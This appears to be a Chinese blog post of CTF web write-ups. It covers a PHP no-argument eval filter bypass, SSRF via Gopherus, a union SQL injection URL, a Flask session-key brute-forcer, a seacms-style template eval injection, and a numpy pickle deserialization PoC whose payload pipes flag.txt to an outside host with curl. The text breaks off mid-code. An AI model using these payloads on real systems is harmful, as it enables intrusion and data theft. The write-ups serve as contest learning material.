<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-cn">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="wp,">










<meta name="description" content="前言近期一些比赛和做过的题的wp,稍微写几道总结下 wps第五届上海市大学生网路安全大赛web decade考点是无参数文件读取123456789101112131415161718&amp;lt;?phphighlight_file(__FILE__);$code = $_GET[&apos;code&apos;];if (!empty($code)) &amp;#123;    var_dump(__DIR__);    if">
<meta name="keywords" content="wp">
<meta property="og:type" content="article">
<meta property="og:title" content="近期比赛的wp">
<meta property="og:url" content="http://wanghuidi.github.io/2019/11/03/近期比赛的wp/index.html">
<meta property="og:site_name" content="star&#39;s blog">
<meta property="og:description" content="前言近期一些比赛和做过的题的wp,稍微写几道总结下 wps第五届上海市大学生网路安全大赛web decade考点是无参数文件读取123456789101112131415161718&amp;lt;?phphighlight_file(__FILE__);$code = $_GET[&apos;code&apos;];if (!empty($code)) &amp;#123;    var_dump(__DIR__);    if">
<meta property="og:locale" content="zh-cn">
<meta property="og:image" content="https://i.loli.net/2019/10/26/7wvkM6uENXTnVbp.png">
<meta property="og:updated_time" content="2019-11-04T03:09:54.172Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="近期比赛的wp">
<meta name="twitter:description" content="前言近期一些比赛和做过的题的wp,稍微写几道总结下 wps第五届上海市大学生网路安全大赛web decade考点是无参数文件读取123456789101112131415161718&amp;lt;?phphighlight_file(__FILE__);$code = $_GET[&apos;code&apos;];if (!empty($code)) &amp;#123;    var_dump(__DIR__);    if">
<meta name="twitter:image" content="https://i.loli.net/2019/10/26/7wvkM6uENXTnVbp.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://wanghuidi.github.io/2019/11/03/近期比赛的wp/">





  <title>近期比赛的wp | star's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-cn">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">star's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://wanghuidi.github.io/2019/11/03/近期比赛的wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="star">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="star's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">近期比赛的wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-03T22:07:17+08:00">
                2019-11-03
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>近期一些比赛和做过的题的wp,稍微写几道总结下</p>
<h2 id="wps"><a href="#wps" class="headerlink" title="wps"></a>wps</h2><h3 id="第五届上海市大学生网路安全大赛"><a href="#第五届上海市大学生网路安全大赛" class="headerlink" title="第五届上海市大学生网路安全大赛"></a>第五届上海市大学生网路安全大赛</h3><h4 id="web-decade"><a href="#web-decade" class="headerlink" title="web decade"></a>web decade</h4><pre><code>考点是无参数文件读取</code></pre><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">$code = $_GET[<span class="string">'code'</span>];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($code)) &#123;</span><br><span class="line">    var_dump(<span class="keyword">__DIR__</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">';'</span> === preg_replace(<span class="string">'/[a-z]+\((?R)?\)/'</span>, <span class="keyword">NULL</span>, $code)) &#123;</span><br><span class="line">        <span class="comment">//</span></span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">'/if|time|local|sqrt|readfile|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i'</span>, $code)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">'bye~'</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">eval</span>($code);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"No way!!!"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"No way!!!"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;/[a-z]+\((?R)?\)/&apos;</span><br></pre></td></tr></table></figure>

<p>这段正则限制了payload只能是以小写字母开头的无参数函数或者嵌套的单一参数函数的组合。</p>
<p>这道题bytectf的时候考过，但是少了对if time local 还有readfile的绕过。来分析下当时的一个payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(chdir(next(scandir(pos(localeconv())))))readgzfile(end(scandir(pos(localeconv()))));</span><br></pre></td></tr></table></figure>

<p>题目明确说了flag在code文件夹在同一层，而文件排序是按照ascii码低到高排，所以相当于是要跳到上一层然后读取最后一个文件的内容。</p>
<ul>
<li>localeconv()函数返回本地数字和货币信息，第一个数据是<code>.</code> 可以通过这个加上pos和current函数来获取当前文件夹的指针 pos(localeconv()) 获取当前目录。</li>
<li>readfile函数用来读取当前文件的内容</li>
<li>chdir函数用来切换文件夹，并返回布尔值。这里scandir列出目录的第二个是<code>..</code>(ls -a)。可以和chdir配和切换到上一层目录。chdir(next(scandir(pos(localeconv()))))</li>
<li>if() 可以用来连接两串表达式</li>
</ul>
<p>这题的几个可替换的点主要如下</p>
<ol>
<li>读文件函数，这里查手册可以发现readgzfile 可以用来替代readfile</li>
<li>获取. 加密后的字符串，搞出小数点，获取数字46，等等办法获取。</li>
<li>逻辑连接，这里没有过滤php的关键词and和or，可以用来连接两串表达式。</li>
</ol>
<p>主要讲下第二点，我选择了加密这条路子</p>
<p>参考手册</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crypt ( string $str [, string $salt ] ) : string</span><br></pre></td></tr></table></figure>

<p>这个函数默认的算法是CRYPT_STD_DES，当不设置salt时，会从./0-9A-Za-z挑选任意两个字母放在最后作为salt，我们需要做的就是，凑到出现.的情况，并且将这个点提取出来。<br>这里我们需要两个函数帮忙</p>
<ol>
<li>strrev逆序</li>
<li>ord 获取字符串第一个字母的ascii </li>
</ol>
<p>最终构造payload如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chr(ord(strrev(crypt(serialize(array()))))) 获取.</span><br></pre></td></tr></table></figure>

<p>这里还可以通过时间函数来获取46这个数字，但是这里time都被过滤了就不行了。另外几个加密函数还没尝试，以后可以去试试。</p>
<p>最终payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(chdir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))and(readgzfile(end(scandir(chr(ord(strrev(crypt(serialize(array())))))))));</span><br></pre></td></tr></table></figure>

<h4 id="web-ssrf-安恒月赛原题"><a href="#web-ssrf-安恒月赛原题" class="headerlink" title="web ssrf (安恒月赛原题)"></a>web ssrf (安恒月赛原题)</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">$x = $_GET[<span class="string">'x'</span>];</span><br><span class="line"> $pos = strpos($x, <span class="string">"php"</span>);</span><br><span class="line"> <span class="keyword">if</span> ($pos) &#123;</span><br><span class="line">     <span class="keyword">exit</span>(<span class="string">"denied"</span>);</span><br><span class="line"> &#125;</span><br><span class="line">$ch = curl_init();</span><br><span class="line">curl_setopt($ch, CURLOPT_URL, <span class="string">"$x"</span>);</span><br><span class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, <span class="keyword">true</span>);</span><br><span class="line">$result = curl_exec($ch);</span><br><span class="line"><span class="keyword">echo</span> $result;</span><br></pre></td></tr></table></figure>

<ol>
<li>strpos 会对字符串urldecode,二次编码urlcode可以过。</li>
<li>文件读取协议读/etc/hosts获取内网ip 172.18.0.3 </li>
<li>fuzz c段和端口 .2上有文件包含，且内网开了25 stmp服务，这里考虑用工具Gopherus打一波。写命令，读文件都可以。</li>
<li>最后读flag</li>
</ol>
<p>需要注意的是由于内网包含的那个参数是get参数，所以我们需要对生成的payload再次urlencode</p>
<h4 id="web-简单地sql注入"><a href="#web-简单地sql注入" class="headerlink" title="web 简单地sql注入"></a>web 简单地sql注入</h4><p>很明显是个注入</p>
<p>fuzz发现过滤了</p>
<pre><code>, ，select union组合中间加东西可以绕过，or，if，--+注释符，-等等</code></pre><p>这里其实我已经发现union注入是可以的，但是，，，，偏偏去盲注了。</p>
<ol>
<li>由于过滤了or所以这里不能从information.schema里拖表名列名，表名可以从mysql.innodb_table_stats的table_name列获取，列名不知道，，，</li>
<li>substr截取字符串，from 可以从最后来去字符串，case when 来替代if。</li>
<li>guoup_concat是没问题的，但是，爆不了，被过滤了，所以只能用limt offset的形式去取数据。</li>
<li>自己写的脚本无法区分大小写，binary好像没有用不知道为啥。</li>
</ol>
<p>最后拖出来数据库名<br>cctttfff ，version  5.6.46，表名 fl111aa44a99g，没了。这里感觉又盲注无列名又无法区分大小写，就没往下做了。赛后才知道，如果那个时候改union注入就，，，，</p>
<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://47.105.183.208:29898/article.php?id=1%27UNION%0ASELECT%20*%20from%20((select%201)a%20join%20(select%20*%20from%20fl111aa44a99g)b)%20limit%201%20offset%201%23</span><br></pre></td></tr></table></figure>

<p>需要关注的就是这个无列名注入应该只有在列只有一个时才能这么用。</p>
<h3 id="pwnhub-公开赛-web"><a href="#pwnhub-公开赛-web" class="headerlink" title="pwnhub 公开赛 web"></a>pwnhub 公开赛 web</h3><p>1.首先f12查看源码</p>
<p>发现提示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;!-- The Matrix --&gt;</span><br><span class="line"></span><br><span class="line">   &lt;!-- run.py --&gt;</span><br></pre></td></tr></table></figure>

<p>尝试包含run.py，获取源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">#- * -coding: utf - 8 - * -''</span></span><br><span class="line"></span><br><span class="line"><span class="string">' ------------------------------------------------- File name : run.py Description : 用于启动 pro-system app Author : RGDZ Date : 2019/04/30 ------------------------------------------------- Version : v1.0 Contact : rgdz.gzu@qq.com License : (C)Copyright 2018-2019 ------------------------------------------------- '</span></span><br><span class="line"></span><br><span class="line"><span class="string">''</span><span class="comment">#</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> lib <span class="keyword">from</span> datetime</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> timedelta <span class="keyword">from</span> numpy.lib</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> npyio <span class="keyword">from</span> flask</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> Flask, render_template, redirect, session, request,url_for, jsonify </span><br><span class="line"></span><br><span class="line">app = Flask(__name__) </span><br><span class="line"></span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = <span class="string">"KEY_SECRET_PWN_H**"</span></span><br><span class="line"></span><br><span class="line">app.config[<span class="string">'PERMANENT_SESSION_LIFETIME'</span>] = timedelta(days = <span class="number">7</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/') </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span> </span><br><span class="line"></span><br><span class="line">  destination = request.args.get(<span class="string">'destination'</span>) </span><br><span class="line"></span><br><span class="line">  session[<span class="string">"username"</span>] = <span class="string">"Agent Smith"</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">#session["username"] = "Ne*"</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> render_template([destination])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/matrix/', methods = ['GET', "POST"]) </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">matrix</span><span class="params">()</span>:</span> </span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> request.method != <span class="string">"GET"</span>: </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> session.get(<span class="string">"username"</span>) != <span class="string">"Ne*"</span>: </span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> u <span class="string">"Matrix discover you, so, you died..."</span></span><br><span class="line"></span><br><span class="line"> npy = request.files.get(<span class="string">"npy"</span>) </span><br><span class="line"></span><br><span class="line"> npyio.load(npy) </span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> render_template([<span class="string">"matrix.html"</span>])</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/findRedeemer/', methods = ['GET']) </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">upload</span><span class="params">()</span>:</span> </span><br><span class="line"></span><br><span class="line">  username = session.get(<span class="string">"username"</span>) </span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> username == <span class="string">"Ne*"</span>: </span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> jsonify(<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> jsonify(<span class="literal">False</span>) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>: </span><br><span class="line"></span><br><span class="line">  app.run(debug = <span class="literal">True</span>, host = <span class="string">"0.0.0.0"</span>, port = <span class="number">80</span>):</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>审计源码发现思路如下，伪造flask的session key以Ne*用户登录，Numpy反序列化命令执行漏洞分析(CVE-2019-6446)，进行命令盲注读取flag.txt</li>
</ol>
<ol start="3">
<li>首先爆破获取flask的secret key，这里用了flask_session_cookie_manager3.py解密，如果使用的secret key能解密成功就得到了secret key</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> hmac</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> hashlib <span class="keyword">import</span> sha1</span><br><span class="line"></span><br><span class="line">key = <span class="string">'KEY_SECRET_PWN_H%s%s'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># key 'KEY_SECRET_PWN_HUB'</span></span><br><span class="line"></span><br><span class="line">ss = <span class="string">'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#key = 'xiaomi.se%s'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># eyJ1c2VybmFtZSI6Ik5lbyJ9.Xbufdg.z9bAy-pxTnqHXGmuBir06DiK4Uc success key</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> ss:</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> ss:</span><br><span class="line"></span><br><span class="line">            key1 = key % (j, i)</span><br><span class="line"></span><br><span class="line">            output = os.popen(<span class="string">"python3 flask-session-cookie-manager/flask_session_cookie_manager3.py decode -s "</span> +</span><br><span class="line"></span><br><span class="line">                              key1+<span class="string">" -c \"eyJ1c2VybmFtZSI6IkFnZW50IFNtaXRoIn0.XbuBbA.odbqqsojbwfpY981QAuKXbYoW0I\""</span>)</span><br><span class="line"></span><br><span class="line">            o = output.read()</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> <span class="string">'error'</span> <span class="keyword">not</span> <span class="keyword">in</span> o:</span><br><span class="line"></span><br><span class="line">                print(key1)</span><br><span class="line"></span><br><span class="line">                exit</span><br></pre></td></tr></table></figure>

<p>获得key ‘KEY_SECRET_PWN_HUB’, 可通过用户 Neo( 这里可以看index.html的源码猜测)</p>
<ol start="4">
<li>利用poc生成test.npy文件（这里需要注意numpy的版本钥匙1.16.0）,上传至。/matrix/即可在vps上获得回显</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> numpy.lib <span class="keyword">import</span> npyio</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> numpy <span class="keyword">import</span> __version__</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># config.pyflag.txtrequirements.txtrun.pystaticsupervisord.logsupervisord.pidtemplates</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;pwn_hub_web_matrix_sjwn&#125;</span></span><br><span class="line"></span><br><span class="line">print(__version__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Test</span><span class="params">(object)</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line"></span><br><span class="line">        self.a = <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (os.system, (<span class="string">'cat flag.txt|curl http://xxx.xxx.xxx.xx:80 -d @-'</span>,))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"></span><br><span class="line">    tmpdaa = Test()</span><br><span class="line"></span><br><span class="line">    npyio.save(<span class="string">"test"</span>, tmpdaa)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># npyio.load("test.npy")</span></span><br></pre></td></tr></table></figure>

<h3 id="unctf-审计（类似seacms）"><a href="#unctf-审计（类似seacms）" class="headerlink" title="unctf 审计（类似seacms）"></a>unctf 审计（类似seacms）</h3><p>##parse_again -&gt; parse_if -&gt; @eval</p>
<p>思路ssti（seacms）</p>
<figure class="highlight plain"><figcaption><span>payload</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">searchtype=5&amp;searchword=&#123;if&#123;searchpage:year&#125;&amp;year=:e&#123;searchpage:area&#125;&#125;&amp;area=v&#123;searchpage:letter&#125;&amp;letter=al&#123;searchpage:lang&#125;&amp;yuyan=(join&#123;searchpage:jq&#125;&amp;jq=($_P&#123;searchpage:ver&#125;&amp;&amp;ver=OST[9]))&amp;9[]=ph&amp;9[]=pinfo()</span><br></pre></td></tr></table></figure>

<p>已知</p>
<ol>
<li><p>每一串传入payload不大于20个字母</p>
</li>
<li><p>: eval 等为敏感字符</p>
</li>
<li><p>共3到2个分割点可以过2到3个敏感字符</p>
</li>
</ol>
<p>#构造第一次</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">content=%<span class="number">3</span>Csearch%<span class="number">3</span>E&#123;<span class="keyword">if</span>&#123;haha:type&#125;T[<span class="number">0</span>])%<span class="number">3</span>C/search%<span class="number">3</span>E&amp;type=:eva&#123;haha:typename&#125;&amp;typename=l($_POS</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$template_html = file_get_contents(<span class="string">"template.html"</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseStrIf</span><span class="params">($strIf)</span></span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(strpos($strIf,<span class="string">'='</span>)===<span class="keyword">false</span>)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">return</span> $strIf;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>((strpos($strIf,<span class="string">'=='</span>)===<span class="keyword">false</span>)&amp;&amp;(strpos($strIf,<span 